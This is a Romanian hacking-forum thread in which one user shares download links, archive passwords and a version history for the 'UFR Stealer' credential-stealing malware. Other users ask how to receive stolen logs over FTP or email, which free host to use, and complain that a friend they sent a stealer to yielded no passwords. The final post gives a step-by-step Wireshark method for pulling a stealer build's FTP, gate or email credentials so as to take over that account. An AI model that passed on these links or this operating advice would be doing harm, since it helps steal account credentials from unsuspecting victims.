io.kent Posted January 3, 2013 Report Posted January 3, 2013 Updated - 31.12.2012 Download: http://vazonez.com/downloads/software/UFR_3.zipPASS:vazonezPentru cei care nu stiu, este versiune Actualizata? ????? ?????!Important, Scanati inaite de-a rula! E cam detectat.. 1 Quote
io.kent Posted January 3, 2013 Author Report Posted January 3, 2013 Am spus ca e ca-m detectat. Dar e bun, Quote
adi1234 Posted January 3, 2013 Report Posted January 3, 2013 (edited) Da vad ca daca vreau sa imi vina logurile pe mail,imi trebe ceva adresa din Rusia?Edit:Am ales optiunea sa imi vina pe ftp,dar intru in server,si imi vine in forma de .bin pe drivehq.com,cum le pot vedea?am incercat sa le bag in notepad,nu merge.Acum miam facut cont pe mail.ru si imi vin logurile da in forma de .bin nu vad nimic,le downloadez ,dau open file with notepad,si mi se vede un scris mult,in rusa sau nu stiu,dar in orice caz nu vad nici un cont de ceva. Edited January 3, 2013 by adi1234 Quote
io.kent Posted January 3, 2013 Author Report Posted January 3, 2013 Vezi pe forum este postat de mine, tutorial, in pdf Quote
YoO_MaN Posted January 3, 2013 Report Posted January 3, 2013 Am spus ca e ca-m detectat. Dar e bun,vad ca te pricepi la stealere imi poti spune si mie de ce nu imi trimite toate logurile HCstealer si iStealer,am facut tot ce trebuia si i-am trimis la un prieten,iar la loguri mi-a aparut doar cdkey de la win7ultimate si id-ul lui,dar fara parola,ai steamid,dar fara parola Quote
jetus Posted January 3, 2013 Report Posted January 3, 2013 vad ca te pricepi la stealere imi poti spune si mie de ce nu imi trimite toate logurile HCstealer si iStealer,am facut tot ce trebuia si i-am trimis la un prieten,iar la loguri mi-a aparut doar cdkey de la win7ultimate si id-ul lui,dar fara parola,ai steamid,dar fara parolaIncearca pe alt host, am patit si eu Quote
YoO_MaN Posted January 3, 2013 Report Posted January 3, 2013 ok mersi o sa incerc.imi poti recomanda ceva bun si gratis? Quote
danke000 Posted January 3, 2013 Report Posted January 3, 2013 ok mersi o sa incerc.imi poti recomanda ceva bun si gratis?Free Web Hosting with PHP, MySQL and cPanel, No Ads Quote
curiosul Posted January 3, 2013 Report Posted January 3, 2013 Am si eu o intrebare. Daca pe firefox sau pe total comander am setat "Master Password" exista posibilitatea ca acele conturi sa mai fie furate? Quote
io.kent Posted January 3, 2013 Author Report Posted January 3, 2013 (edited) Evident ca exista, dece sa nu fure, ?Logic e sa poata fura, din cauza ca nu ai cum sa setezi in asa fel, incat sa cripteze, si nici asa! Edited January 3, 2013 by io.kent Quote
danke000 Posted January 4, 2013 Report Posted January 4, 2013 Am si eu o intrebare. Daca pe firefox sau pe total comander am setat "Master Password" exista posibilitatea ca acele conturi sa mai fie furate?Dincate stiu eu da se poate Recomand https://lastpass.com/Testa cu stelare diferite nu am reusit sa extrag nimica din el Quote
YoO_MaN Posted January 4, 2013 Report Posted January 4, 2013 Free Web Hosting with PHP, MySQL and cPanel, No Adschiar pe 000webhost am hostate site-urile Quote
HaarpCord Posted January 5, 2013 Report Posted January 5, 2013 Nu e prea bun dar hai sa zicem da:))! Quote
io.kent Posted January 9, 2013 Author Report Posted January 9, 2013 UFR Stealer 3.1.3.0 [updated 8-1-2013]https://vazonez.com/downloads/software/UFR_3.zipPassWord: vazonezBest RegardsScreenShot Quote
io.kent Posted January 20, 2013 Author Report Posted January 20, 2013 (edited) [uFR Stealer] v.3.1.4.0[uFR Stealer] v.3.1.4.0Password: vazonezFixed a definition of the axis for the eighth Wendy and server 2k12, fix parsing of some reports - sometimes fell parser, fixed generation HWID - losses is 32 characters, and it seems to be more unique. Well, of added - double killer. Load fayleki reports (as you can and already bin'y proparsennye) -click "Remove duplicates" and it cut out duplicate reports of the same people (it is better to make the copies of reports). Link - default, the password too.All versions:v2.0.2.0:https://vazonez.com/downloads/software/UFR_Stealer_712b80e1ac98cf68e92711b51bfcea34657f50fc.rarv2.1.0.0:https://vazonez.com/downloads/software/UFR_Stealer_5397b7ecbf6de27f3abbab9e52bd6a41658b75b7.rarv2.2.0.0:https://vazonez.com/downloads/software/UFR_Stealer_9d63abb94829ad629cdf1a36e5f6b89ba145efde.rarv2.3.0.0:https://vazonez.com/downloads/software/UFR_Stealer_0d8ce496dec63ff33bc0a810bdaabae1c5ca5aa4.rarv2.3.1.0:https://vazonez.com/downloads/software/UFR_Stealer_a1cba295f1810cc10a1c52a9ae75a065ab3f45b4.rarv2.4.0.0:https://vazonez.com/downloads/software/UFR_Stealer_5497bb261a4fef7c95f1968a409255f74f2f92aa.rarv2.5.0.0:https://vazonez.com/downloads/software/UFR_Stealer_d4082075ba0beb2d5d605c9a4992979108969477.rarv2.5.1.0:https://vazonez.com/downloads/software/UFR_Stealer_a5ba3297c851f7c85e7d940b50fedce125903aea.rarv2.6.0.0:https://vazonez.com/downloads/software/UFR_Stealer_5bc75ffc14f19b899cbf190b2b125f4b6a0204f4.rarv3.0.0.0:https://vazonez.com/downloads/software/UFR_3_0_0_0.zipv3.0.1.0:https://vazonez.com/downloads/software/UFR_3_0_1_0.zipv3.1.0.0:https://vazonez.com/downloads/software/UFR_3_1_0_0.zipv3.1.1.0:https://vazonez.com/downloads/software/UFR_3_1_1_0.zipv3.1.2.0:https://vazonez.com/downloads/software/UFR_3_1_2_0.zipSniff build UFR StealerWe will catch the gate/ftp/email, which set the existing build stealer.We need:- Build stealer- Wireshark - VirtualBox1. The first thing to do - kill all of the processes that use the network. So it will be easier to find the data you need.2. Run Wireshark and configure the interface for sniffing: Capture -> Interfaces. Choose the one that you used - in the column will be the largest number of Packets. Click "Start", thereby starting sniffing.3. Run the build stealer (all on VirtualBox, and nothing else!) and control Process Explorer his work forward to the completion.4. Go to Wireshark and click Capture -> Stop, that is complete sniffing. We now have a dump of the network activity of the entire system for while working build stealer. It remains to find the desired data.FTP:To start trying to detect FTP-server, suddenly stealer in this way sends a report with passwords.We go to the Wireshark and type into the filter field word "ftp" and press "Enter":We received the packages sent by FTP:(In the picture selected host, username and password of FTP)Gate:Try to catch the gate address. Remove the "ftp" from the line filter and look for the package follows stealer. Hit Ctrl + F to open the search window. Choosing a search string (Find by: String) and type into the search string "UFR", leave the rest on the default. If the build is to send the password to the gate, something had to be found.Email:To do this in the filter field, trying to type the string "smtp" and see this:Decode username and password from soap sender using thishttp://www.opinionatedgeek.com/dotnet/tools/base64decode/Go to the email and change the password.Bafta! Edited January 22, 2013 by io.kent Quote